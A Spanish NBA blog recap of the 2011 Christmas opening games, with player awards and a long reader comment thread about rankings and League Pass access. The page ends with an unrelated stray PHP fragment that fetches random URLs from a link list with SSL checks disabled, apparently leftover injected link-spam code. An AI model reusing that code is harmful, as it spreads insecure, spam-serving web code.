La Crónica (25/12/2011)

26 de December de 2011 por TheDeerHunter

Qué ganas teníamos de decirlo… ¡por fin comenzamos!

No lo haremos cronológicamente. La temporada daba comienzo simbólico con la ceremonia de izado del estandarte del último título en el American Airlines Center de Dallas, ante los ojos dolidos de los subcampeones. Como suele suceder en estos casos fiesta local se traduce en merienda visitante. El descalabro se veía venir atendiendo a la enfocada mirada de LeBron. Con la ayuda de Wade, la nueva versión discreta de si mismo buscó quitarse la espina desde el principio y pillaron a los anfitriones demasiado descolocados. Los cambios en la plantilla y el ritmo parecen haber afectado especialmente a los campeones. Daba un poco de sonrojo verificar cómo el actual Vince Carter trataba de defender torpemente a los dos primeros espadas de Miami. Odom entró con mucha voluntad de agradar, pero con poco tino. Con diferencias que llegaron a alcanzar los 35 puntos podemos hacernos idea del sonrojo señalando que uno de los mejores momentos locales fue con Brian Cardinal en pista. De la mano de Jason Terry y Delonte West maquillaron un marcador de forma que cualquier parecido con la realidad fue pura coincidencia (105-94).

Antes habíamos presenciado en el Madison lo que puede ser un cambio de orden en la división Atlántico. Los Knicks llevaban un parcial de derrotas contra su más odiado rival en el Este de 16 de 18 partidos en la regular. Durante la primera parte parecía que le iban a dar una buena tunda a los verdes, con Melo haciendo y deshaciendo ante la ausencia de Pierce. Con la suma de Stat, una buena racha de Toney Douglas y el descaro del rookie Iman Shumpert le metían más de 60 en la primera parte que bien podrían haber sido 80 con una defensa verde que hacía bramar a Doc Rivers: “¡Así no podemos ganar un partido de baloncesto en la vida!” Sin embargo los locales no sabían rematar y sin saber muy bien como los Celtics seguían vivos. Rondo comenzó la reacción a base de robos y, cuidado aquí, a base de lanzamientos muy importantes. También conviene destacar un Brandon Bass sensacional. Durante el tercer cuarto parecía que se llevaban el gato al agua. Sin embargo, en el último, apareció el Melo más letal e indefendible. Aún la tendría Boston para empatar pero una afortunada defensa de Bill Walker a Garnett selló la victoria para su equipo. A Garnett no le hizo demasiada gracia el resultado y agarró a su excompañero del cuello. Además de la derrota posiblemente se llevará algún partido extra de vacaciones (104-106).

Llegaban los Bulls al Staples por primera vez favoritos desde hace mucho tiempo. Ante los últimos acontecimientos no se respira demasiado optimismo en el nuevo equipo de Mike Brown. Sin embargo, los amarillos sorprendieron. Se vió una imagen muy distinta de la del último año de Phil Jackson, con una interesante aportación de Josh McRoberts, Devin Evanks (ambos titulares), Murphy, Blake y el rookie Goudelouck. Partido excepcionalmente serio de ambos equipos. Para nada parecía un primer choque irrelevante de una regular atípica como ésta. Los Lakers tuvieron el partido en sus manos a falta de un minuto pero los Bulls aguantaron con casta y una serie de errores finales estropeó el buen partido de Pau y el debut de su nuevo técnico y compañeros. Gran partido de Kobe, de Deng y también del vigente MVP Rose excepcionalmente acertado en el tiro exterior (88-87).

Finalmente no nos detendremos demasiado en los últimos dos partidos. Los Thunder de la mano del de siempre no tuvieron rival en unos Magic excesivamente blanditos (con un Howard bastante decepcionante, 89-97) y los Clippers tampoco ante los Warriors (105-86). Buen debut de la pareja Paul-Billups.

PREMIOS

MVP: Nuestro primer MVP de la temporada bien podría ser LeBron James, con un arrollador 37-10-6-2-2 en 36 minutitos de juego. Sin embargo, el hecho de que su par no fuera Pierce y que Carmelo Anthony haya resultado más imprescindible para la victoria de su equipo hace que nos decidamos por él. Los números de Melo fueron de 37 ptos, 8 rebotes, 3 asistencias, 2 robos y 1 tapón.

Rookie: Causó sensación Iman Shumpert el tiempo que estuvo en pista hasta que sufrió un esguince en su rodilla. Más que números, en su caso, hablamos de descaro y del cirio que montó en medio de la defensa de los Celtics. También gustó mucho Norris Cole para Miami, que huele a que pasará a Chalmers pronto en la rotación y también Goudelock por los Lakers, un cañonero fino, fino.

Sorpresa: Sensacional Brandon Bass con sus 20-11 y eso que uno piensa que son números que deberían estar al alcance de su mano más habitualmente. También agradó el rendimiento de la dupla McRoberts-Murphy. A ese nivel quizás no se eche tanto en falta a Lamar.

Decepción: Flojo debut de Supermán, pero para decepciones ninguna como la lamentable serie de tiro de Stephen Curry (2/12). La inesplicable expulsión de Odom, así como la patética reacción de Garnett en la derrota son capítulos a parte dentro de esta categoría.

Esfuerzo en vano: El lockout le ha aprovechado a algunos. Menudo jugadorazo es Rajon Rondo si es cierto que ha mejorado el tiro. Rozó por un punto la mayor anotación de su carrera. 31 puntos (11/19), 13 asistencias y 5 robos. A ese nivel yo no sabría decir quién es el mejor base del Este.

Comenta

44 comentarios a esta entrada

  1. nach dice:
    #1

    Un apunte: el par de Carmelo no ha sido Pierce, que no ha jugado

      Citar

  2. TheDeerHunter dice:
    #2

    Lapsus… si lo ví en directo!!! XD XD XD
    En realidad tenía en la cabeza que Melo lo tuvo relativamente fácil porque su par no fue Pierce… pero no sé bien como al final lo he terminado enfocando en LeBron (me pierde el subsconciente en ambos casos)

      Citar

  3. Javijaen dice:
    #3

    Como dice nach, el par de Carmelo no era Pierce (lesionado con traje y corbata), sino Marquis Daniels, Sasha Pavlovic, o a veces, el equipo entero de Celtics… De todas formas, como aficionado a los Knicks, estoy contento con su actuación…
    De acuerdo con todo, aunque en decepción podría entrar la Mamba Negra, desastroso en los momentos finales…
    Por cierto, atención a Clippers, que pienso que pueden estar en semis del Oeste… (No me deis muchos palos…).

      Citar

  4. melo15 dice:
    #4

    me he llevado un sorpesa con curry, parecia que esta temporada iba ha explotar de verdad pero…
    A mi el shumpert este me parece bastante bueno,

      Citar

  5. nach dice:
    #5

    TheDeerHunter:
    Lapsus… si lo ví en directo!!! XD XD XD
    En realidad tenía en la cabeza que Melo lo tuvo relativamente fácil porque su par no fue Pierce… pero no sé bien como al final lo he terminado enfocando en LeBron (me pierde el subsconciente en ambos casos)

    Si, está claro que no es lo mismo que te defienda Pierce a que no lo haga xD

    Los Knicks han dado un paso adelante pero para mí siguen a otro nivel relativo a por ejemplo los propios Celtics, a los que hoy han mantenido con vida Rondo y Brass, ya que Allen y KG no aparecían en ataque y en defensa era un coladero tremendo.
    Lo de Rondo como mejore el tiro puede empezar a ser algo de proporciones épicas, está claro que de 3 nunca será un buen tirador, pero si adquiere tiro de media distancia puede hacer mucho mejores a estos Celtics atrayendo defensores hacia el. Pero les sigo viendo un problema de cm. en defensa para defender a un equipo con 2 hombres altos buenos ofensivamente (Memphis, Lakers…).

    Y los Knicks, partidazo de Melo y Stat con problemas en cuanto la defensa se cerró sobre el en la segunda parte porque Chandler no aporta ofensivamente, igual por ahí pueden tener un problema, porque pueden anular su juego interior únicamente con un buen defensor, y no tienen a Wade-LeBron por fuera para obligar a abrir espacios…

      Citar

  6. melo15 dice:
    #6

    COMO LO VEIS EN DIRECTO

      Citar

  7. Ru dice:
    #7

    Lo de Rondo ayer fue la leche a pesar de la derrota…siempre se ha dicho que como mejorará su tiro ojito,pues ayer al menos dió la sensación de que lo ha trabajado.

    Ayer no vi ningún partido entero pero si momentos de todos quitando el partido de los Clippers.Lo mejor para mí la parte final del Lakers – Bulls(pase perdido culpa de KOBE,que cuando hay ganas de cargarse a alguien van a disparar y Gasol en esa jugada no tiene la culpa).Fenomenal Deng&Rose.

    PD.estadísticamente vaya partidazo de Billups,y eso que había pensando en “colgar las botas”

      Citar

  8. nach dice:
    #8

    Ru:
    Lo de Rondo ayer fue la leche a pesar de la derrota…siempre se ha dicho que como mejorará su tiro ojito,pues ayer al menos dió la sensación de que lo ha trabajado.

    Es que Rondo como sume tiro de media distancia (ya no pido de 3 xD) a su repertorio, ojito: probablemente el mejor base defensivamente hablando de la NBA, físicamente es un portento, gran visión de juego y una capacidad para penetrar tremenda. Si a eso le sumas tiro pasaría a ser muy probablemente el mejor base de toda la liga.

      Citar

  9. Vader dice:
    #9

    melo15:
    COMO LO VEIS EN DIRECTO

    Supongo que con el League Pass de la NBA que hasta el 9 de enero es gratuito. Meteté en NBA.COM para ver como va porque yo no lo se la verdad…

    Saludos

      Citar

  10. inad23 dice:
    #10

    Tambien,junto a Rondo y su mejora en el tiro,otro que tambien ha mejorado en el tiro es Rose,llevaba 3 de 3 en triples al descanso….Ya empezo a tirar mejor el año pasado pero no con tanta eficiencia como en este…

      Citar

  11. nach dice:
    #11

    melo15:
    COMO LO VEIS EN DIRECTO

    League Pass. Entra en ilp.nba.com e infórmate.
    De la alternativa no creo que esté permitido hablar aquí xD

      Citar

  12. melo15 dice:
    #12

    Okok

      Citar

  13. German dice:
    #13

    Si lo de Rondo ayer no fue casualidad y realmente estuvo trabajando el tiro seria el base mas completo de toda la liga, ojala siga asi porque da gusto verlo jugar. Pude ver el partido de los Clippers y si bien ya son un buen equipo por los nombres que tienen, da la sensacion que cuando tengan un par de meses juntos seran un equipo muy peligroso para cualquiera. Les faltaria sumar algun suplente mas para la rotacion. Veo potable la dupla Paul-Billups.

    PD: Genial el pase de espaldas que da Rondo ayer… Que bueno que volvio la NBA!!

      Citar

  14. Denise dice:
    #14

    Ru:

    Ayer no vi ningún partido entero pero si momentos de todos quitando el partido de los Clippers.Lo mejor para mí la parte final del Lakers – Bulls(pase perdido culpa de KOBE,que cuando hay ganas de cargarse a alguien van a disparar y Gasol en esa jugada no tiene la culpa).Fenomenal Deng&Rose.

    Y con la calidad que tiene Kobe y la vision de juego cuando quiere, en la ultima jugada podría haber doblado el pase tanto por debajo o en alley-opps a Gasol que se encontraba solo, ya que Noah se habia lanzado como un poseso a por Bryant

      Citar

  15. Kantonyo dice:
    #15

    Pésimo partido de Dwight Howard, ante una buena defensa de Perkins-Ibaka. Cuanto se le perdona a este jugador!!! Que alguien me explique como esta considerado un top5, con jugadores como LeBron, Paul, Durant, Nowitzki, Bryant, Griffin, Wade, Rose… Mal pintan las cosas para Orlando viendo ademas el nivel Jason Richardson

      Citar

  16. The wolf dice:
    #16

    Ayer se me fue la cabeza viendo absolutamente todos los partidos de ayer…mucho sueño ahora…a resumidas cuentas y para no hablar de los 3 partidos estelares que ya habeis hablado vosotros queria destacar que el partido mas esperado por mi me gusto, hablo de los clippers…me molan estos clippers y creo que si ahora son un muy buen equipo como el señor chancey se integre y de el 100% por el proyecto pueden ser la grata sensacion de la temporada….

    por otro lado mis ansiados thunders tienen una pinta muy buena con un gran ritmo de juego y con un perkins fibroso y que esperemos deje de un lado sus problemas musculares…de hoy se saca la conclusion de que el duelo MVP entre lebron, carmelo, Durant y Rose va a ser digno de ver

      Citar

  17. The wolf dice:
    #17

    por cierto ayer el league pass no funcionaba…y nba saco un canal alternativo llamado “nba xmas”, si hoy falla intentad buscarlo por google que es el canal de la nba sustitutivo del league pass nada de ilegalidades y esas cosas xD

      Citar

  18. GreenPride dice:
    #18

    Pues empezó la liga con algunos buenos partidos y otros no tanto. Yo vi el Knicks-Celtics, Mavs-Heat y Thunder-Magic.
    De lo visto, buen partido en el Madison. En la primera parte sólo Rondo se salvó en unos Celtics que parecían a la deriba recibiendo más de 60 puntos y con Doc llamándoles “soft” a sus jugadores. En la segunda salieron con las pilas puestas y dieron la vuelta a la situación hasta que Carmelo se echo a su espalda a los de New York para llegar a un final igualadísimo en el que el propio Melo acabó decidiendo. A parte de la gran actuación de Melo, los Knicks tuvieron un buen Stat y buen ataque pero siguen adoleciendo de un base en condiciones que sepa que hacer cuando vienen mal dadas y en la segunda parte su defensa fue bastante mala en general. Queda trabajo pero hay mimbres. En los Celtics espectacular Rajon Rondo. Los verdes ya son su equipo así que veremos hasta donde los llevará. Con Pierce y Pietrus el equipo creo que volverá a ser un contendiente aunque los veo algo por debajo de Heat y Bulls. Gran partido de Brandon Bass que da un plus en ataque y rebote. Lo malo es que su próximo partido (mañana) será en Miami….
    Y aquí está Miami. Antes de nada decir que los Mavs seguían de vacaciones cuando se inició el partido. Con Dirk totalmente fuera de forma, no en cuanto a peso pero sí en cuanto a toque baloncestístico al igual que Kidd nada pudieron hacer ante unos enfurecidos LeBron y Wade. Cambio importante en los sistemas de los Heat ya que Spoelstra se ha dado cuenta de lo bestias pardas que son esos 2 y pone en casi todas las jugadas a uno de los 2 al poste. Menos tiros exteriores, menos fallos, más faltas a favor. Mucho mejor táctica para sus características y una gran defensa. El novato Cole le comerá la tostada a Chalmers más pronto que tarde y Bosh acostumbrado ya a ser complemento, los Heat son los claros favoritos al título. Por los Mavs, un Vince Carter que pareció un ex-jugador, Odom voluntarioso pero desacertado y una defensa que ha perdido su intensidad sin Stevenson y Chandler. Les queda mucho trabajo para volver a ser aspirantes de nuevo al anillo.
    Y en Oklahoma victoria fácil de los Thunder ante los Magic. En Oklahoma fenomenal Durant, que suma puntos con una facilidad escándalosa y en general todo el equipo bastante conjuntado y bastante bien. Lo mejor, que son los mismos pero un año mejores pues todos los jugadores parecen evolucionar a mejor, sobre todo Harden. El único pero, las pérdidas de Westbrook que le siguen lastrando. Si las controla, ahora mismo parecen el mejor equipo del Oeste.
    De lo demás, parece que los Lakers jugaron mejor de lo que se esperaba. Yo sólo he visto el resumen pero se confirma que puede que hayan acertado con Troy Murphy, lo que para ellos sería todo un regalo. Yo sigo diciendo que tienen plantilla para si se conjuntan y van todos a una, dar un susto a cualquiera. Dicho esto parece mentira que un equipo con su experiencia regale un partido como hicieron en las últimas posesiones. Los Bulls, pues probablemente el mejor equipo del Este tras Miami, serán un rival durísimo, co gran defensa. Si consiguen que RIP aporte y su ataque sea variado serán aspirantes al anillo.
    Y en Golden State por lo que parece Chris Paul tomó el mando en el último cuarto para guiar a los Clips a su primera victoria. Les queda camino y enseñar a DeAndre Jordan que a parte de poner chapas (8 en total) tiene que aprender a tirar los libres pero con los jugadores que tienen para mí no verlos entre los 4 primeros del Oeste sería un completo fracaso. De los de la bahía, con Curry haciendo 4/12 no ganarán ni a los Cavs así que más vale que vayan espabilando.

      Citar

  19. Lanegan dice:
    #19

    The wolf: el NBA league pass está bloqueado (blackout) para los partidos donde tiene el acuerdo de retransmisión Canal +. Hay que verlos en diferido o recurrir a “alternativas”.

      Citar

  20. melo15 dice:
    #20

    No lo entiendo donde he de ir en el ordenador para verlos,y cuando he de pagar?
    Explicarmelo paso a paso

      Citar

  21. melo15 dice:
    #21

    Por otro lado,para mi el mvp es para melo o para durant porque james con wade y bosh no se lo daran

      Citar

  22. The wolf dice:
    #22

    vamos a ver melo mas facil nose si esta permitido dar webs por aqui asi que presta atencion…cuando a un jugador le expulsan en un partido de futbol le echan una “roja directa” pues bien ahora pones esas palabras entrecomilladas en google y ya dentro le das al partido que quieras ver…tampoco es tan dificil

      Citar

  23. nach dice:
    #23

    the wolf:totalmente sublime xDD

      Citar

  24. Sancho88 dice:
    #24

    Nenes, no deis tanta caña a Curry que el chaval sale de una lesión de tobillo. Que nadie dude de los Warriors como un equipo duro dentro del oeste, que un año más llevará todos sus partidos a +100 puntos y en casa te pueden meter 60 en una parte fácilmente. Destaca el acierto con David Lee, que para mí es el ‘4’ más infravalorado de la liga. No sé como le veis vosotros, yo creo que le pasa como a Pau, hasta que realmente no acabe en un grande no verá la gente lo bueno que es. Por lo demás, pasito al frente ya de Dorrell Wright y si Ellis está en sus números, ojito con la última plaza del oeste entre Hornets, Warriors y Wolves, que lo mismo los Spurs la ven volar…

      Citar

  25. melo15 dice:
    #25

    Ya entro pero me sale que lo he de comprar

      Citar

  26. melo15 dice:
    #26

    Y porque no se puede decir paginas web

      Citar

  27. Sancho88 dice:
    #27

    melo, mira. es fácil. Pinchas donde pone FREE PREVIEW DECEMBER 25th – JANUARY 9th, que es una pestañita roja. Eso te saldrá en la pestaña LEAGUE PASS, y luego en la subpestaña LEAGUE PASS FOR TV. Y ahí te registras gratis. Ya más no te puedo hacer, como no sea que me des tus datos y te registro directamente… pero no me quiero meter en jaleos, lógicamente. Ya te digo, dale donde yo te digo y el resto lo deberías saber hacer sin problemas. Saludos

      Citar

  28. LEmontus dice:
    #28

    melo eres muy pesado ahora mismo el pass es gratis y te hacen pagar en dos semanas qe son unos 60 euros mas o menos y te da la opciond e verlo en directo y al dia siguiente. no es tan dificil

      Citar

  29. LEmontus dice:
    #29

    LEmontus: melo eres muy pesado ahora mismo el pass es gratis durante dos semanas y luego tienes que pagar unos 60 euros mas o menos y te da la opcion de verlo en directo y al dia siguiente. no es tan dificil

      Citar

  30. Denise dice:
    #30

    Kantonyo:
    Pésimo partido de Dwight Howard, ante una buena defensa de Perkins-Ibaka. Cuanto se le perdona a este jugador!!! Que alguien me explique como esta considerado un top5, con jugadores como LeBron, Paul, Durant, Nowitzki, Bryant, Griffin, Wade, Rose… Mal pintan las cosas para Orlando viendo ademas el nivel Jason Richardson

    Esta claro que los Magic no van a ganar la NBA, y que Superman esta frito por largarse, pero darle caña de esa manera. Crucificarlo por un partido, que encima es el primero, y hay muchos jugadores que aun no habran cogido la forma me parece excesivo. Idem para Jason Richardson

    Por esa regla de 3, Noah (ofensivamente), Curry y Odom tambien son unas castañas porque no tuvieron ayer su mejor nivel.

      Citar

  31. Uno cualquiera dice:
    #31

    NBA Forever. MUST SEE:

      Citar

  32. zapa1973 dice:
    #32

    todavia no vi el partido de los clippers, pero estoy muy ilusionado con el nuevo equipo de paul, aunque necesita un escolta y un buen interno en el banco!! en new orleans parece precisan un base…

      Citar

  33. Kantonyo dice:
    #33

    Denise: Esta claro que los Magic no van a ganar la NBA, y que Superman esta frito por largarse, pero darle caña de esa manera. Crucificarlo por un partido, que encima es el primero, y hay muchos jugadores que aun no habran cogido la forma me parece excesivo. Idem para Jason Richardson

    Por esa regla de 3, Noah (ofensivamente), Curry y Odom tambien son unas castañas porque no tuvieron ayer su mejor nivel.

    Es que a Dwight hay que exigirle regularidad, y no compararle con Noah, Odom o Curry. En ESPN le nombra segundo mejor jugAdor de la liga y nadie se echa las manos a la cabeza… Ser 2ndo mejor jugador son palabras mayores, a mi en cambio me cuesta meterle entre los 10 mejores, y no hablo solo del partido de ayer.

      Citar

  34. fede dice:
    #34

    Los Heat muy muy favoritos, algo raro ha de pasar para que no se lleven el anillo. Lo que pasa con Howard es que no quiere estar en Orlando, supongo que acabarán vendiéndolo dentro de poco porque si no se les va a ir y no van a ver nada a cambio.

    PD: ¿De dónde habéis sacado a melo 15? Es muy gracioso………………….

      Citar

  35. Denise dice:
    #35

    Kantonyo: Es que a Dwight hay que exigirle regularidad, y no compararle con Noah, Odom o Curry. En ESPN le nombra segundo mejor jugAdor de la liga y nadie se echa las manos a la cabeza…Ser 2ndo mejor jugador son palabras mayores, a mi en cambio me cuesta meterle entre los 10 mejores, y no hablo solo del partido de ayer.

    No estoy de acuerdo pero cada uno tiene su opinion. Para mi Howard sería el nº 4 de la liga por detras de Lebron, Rose y Durant.

      Citar

  36. melo15 dice:
    #36

    Tio los hombre altos tienen mas valor ademas hay pocos pivots que puedan defender a howard y nadie le puede superar en cambio, rose,que es muy bueno pero paul deron westbrook wade le pueden superar.

      Citar

  37. Cocinitas dice:
    #37

    Por fin dió comienzo la temporada en la NBA, que ganas tenia ya de ver partidos serios. Ayer vi el Knicks-Celtics, y saqué dos conclusiones, creo que Celtics van a sufrir mucho esta temporada dado lo especial de la misma y lo cargado que va a estar el calendario, y dos vi a Baron Davis muy involucrado a pie de campo dandole incluso una charla al joven Shumpert. Los Knicks jugaron un buen partido, en especial Carmelo que se salio en la cancha. Creo que los Knicks serán terceros en la conferencia Este y llegarán a la semifinal de conferencia, pero con D´antoni no creo que lleguen más lejos.
    En cuanto al tema Howard, pienso sinceramente que si bien es cierto que es el mejor center de la liga, también he de decir que esta a años luz de los Shaquille, Ewing, Olajuwon y compañia; le faltan recursos en ataque para ser tan decisivo como lo eran ellos. Por tanto no estoy de acuerdo con Denise en que sea el 4º mejor jugador de la liga, hay otros como Melo, Nowitzky, Kobe o Wade que son mucho más decisivos para sus equipos.

      Citar

  38. melo15 dice:
    #38

    Es decir, cocinitas, tu lo pones mas bajo?

      Citar

  39. Albertis dice:
    #39

    Yo creo que no podía haber una muestra más clara nada mas empezar de que empieza el renacer de varios equipos y el ocaso de otros tantos; evidentemente esto acaba de empezar pero el indício está ahí! Los 3 últimos campeones cayeron en manos de 3 franquicias que emergen con fuerza para intentar dominar estos próximos años…
    Un saludo

      Citar

  40. nach dice:
    #40

    Para mí Howard está en el top 10, pero no se yo si en el top 5, a pesar de ser el mejor pívot de la competición:
    – LeBron, Durant, Kobe, Wade son el top 4
    – Nowitzki, Rose, Howard, Carmelo, Deron, Paul para mí los 6 siguientes.

      Citar

  41. Denise dice:
    #41

    Cocinitas:

    En cuanto al tema Howard, pienso sinceramente que si bien es cierto que es el mejor center de la liga, también he de decir que esta a años luz de los Shaquille, Ewing, Olajuwon y compañia; le faltan recursos en ataque para ser tan decisivo como lo eran ellos.

    Pero por qué se tiende a comparar a jugadores muy buenos con superestrellas que salen uno de entre 1.000 jugadores. Eso lo unico que hace es infravalorar al que comparas.
    Por esa regla de 3, Deron y Paul son muy buenos pero no son Magic Johnson, y Carmelo está a años luz de Jordan (incluso de Lebron).

    DH12 es muy bueno, es claramente el mejor pivot de la competicion. Cualquier coach lo querría en su equipo y pese a no tener los recursos de los monstruos de los que hablas te hace un 20-12 con la gorra, y si su % de tiros libres fuese superior se iria a los 30 ptos de media.

    PD: No puedo entrar desde ayer en la Liga Hoops. La pagina no me carga…¿a alguien mas le pasa?

      Citar

  42. TheDeerHunter dice:
    #42

    Para mí sin ni la más mínima duda Howard está entre el top5 de la liga. Otra cosa son sus actuales circunstancias personales y lo que le afecten a la motivación y el rendimiento.
    Conforme el equipo en el que se encuentre se acerque a los objetivos acordes a su potencial brillará más.

    PD: La hoops va como el puñetero culo. Menuda pesadilla.

      Citar

  43. melo15 dice:
    #43

    En eso teneis razon pero carmelo me recuerda mucho a wilkins

      Citar

  44. TheDeerHunter dice:
    #44

    ¿En qué recuerda Carmelo a Wilkins? No se parecen absolutamente en nada. Son rematadamente antagónicos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>